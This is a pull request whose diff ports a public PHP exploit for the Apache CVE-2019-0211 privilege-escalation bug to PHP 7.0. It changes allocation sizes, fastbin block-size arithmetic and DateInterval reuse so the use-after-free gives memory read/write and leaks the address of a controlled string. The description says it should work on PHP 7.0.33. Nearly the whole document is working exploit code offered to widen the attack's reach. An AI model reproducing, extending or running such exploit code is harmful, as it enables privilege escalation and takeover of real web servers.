### PR TITLE
UAF offsets fixes for php7.0

### DIFF
--- a/CVE-2019-0211-apache/cfreal-carpediem.php
+++ b/CVE-2019-0211-apache/cfreal-carpediem.php
@@ -139,7 +139,10 @@ class Z implements JsonSerializable
 		# Build string meant to fill old DateInterval's timelib_rel_time
 		# I: ptr2str's name is unintuitive here: we just want to allocate a
 		# zend_string of size 78.
-		$_protector = ptr2str(0, 78);
+		if(version_compare(PHP_VERSION, '7.1') >= 0)
+			$_protector = ptr2str(0, 78);
+		else 
+			$_protector = ptr2str(0, 70); //slightly less
 
 		o('  Allocating $abc and $p');
 
@@ -149,7 +152,10 @@ class Z implements JsonSerializable
 		# timelib_rel_time structure under our control. The first 8*8 = 64 bytes
 		# of this structure can be modified easily, meaning we can change the
 		# size of abc. This will allow us to read/write memory after abc.
-		$this->abc = ptr2str(0, 79);
+		if(version_compare(PHP_VERSION, '7.1') >= 0)
+			$this->abc = ptr2str(0, 79);
+		else
+			$this->abc = ptr2str(0, 71); //slightly less
 
 		# Create $p meant to protect $this's blocks
 		# I: Right after we trigger the UAF, we will unset $p.
@@ -182,15 +188,21 @@ class Z implements JsonSerializable
 		# !!! This is only required for apache
 		# Got no idea as to why there is an extra deallocation (?)
 		if(version_compare(PHP_VERSION, '7.2') >= 0)
-            		$room[] = "!$_protector";
-
+			$room[] = "!$_protector";
+		else if(version_compare(PHP_VERSION, '7.1') < 0)
+			$room[] = new DateInterval('PT1S'); //DateInterval that points to $this->abc is already here
+		
 		o('  Creating DateInterval object');
 		# After this line:
 		# &((php_interval_obj) x).timelib_rel_time == ((zval) abc).value.str
 		# We can control the structure of $this->abc and therefore read/write
 		# anything that comes after it in memory by changing its size and
 		# making in-place edits using $this->abc[$position] = $char
-		$x = new DateInterval('PT1S');
+		if(version_compare(PHP_VERSION, '7.1') < 0)
+			$x = end($room);
+		else
+			$x = new DateInterval('PT1S');
+		
 		# zend_string.refcount = 0
 		# It will get incremented at some point, and if it is > 1,
 		# zend_assign_to_string_offset() will try to duplicate it before making
@@ -232,19 +244,23 @@ class Z implements JsonSerializable
 		# position of $abc in memory
 		# I: We know the absolute position of the SHM, so we need to need abc's
 		# as well, otherwise we cannot compute the offset
-
+		
+		if(version_compare(PHP_VERSION, '7.1') >= 0)
+			$block_size = 0x70;
+		else
+			$block_size = 0x60;
 		# Assuming the allocation was contiguous, memory looks like this, with
-		# 0x70-sized fastbins:
+		# $block_size-sized fastbins:
 		# 	[zend_string:abc]
 		# 	[zend_string:protector]
 		# 	[FREE#1]
 		# 	[FREE#2]
 		# Therefore, the address of the 2nd free block is in the first 8 bytes
 		# of the first block: 0x70 * 2 - 24
-		$address = str2ptr($this->abc, 0x70 * 2 - 24);
+		$address = str2ptr($this->abc, $block_size * 2 - 24);
 		# The address we got points to FREE#2, hence we're |block| * 3 higher in
 		# memory
-		$address = $address - 0x70 * 3;
+		$address = $address - $block_size * 3;
 		# The beginning of the string is 24 bytes after its origin
 		$address = $address + 24;
 		o('Address of $abc: 0x' . dechex($address));


### PR DESCRIPTION
Less bytes are allocated on php 7.0, needed some adjustments.

It should work on php 7.0.33, if this could help...

Load.
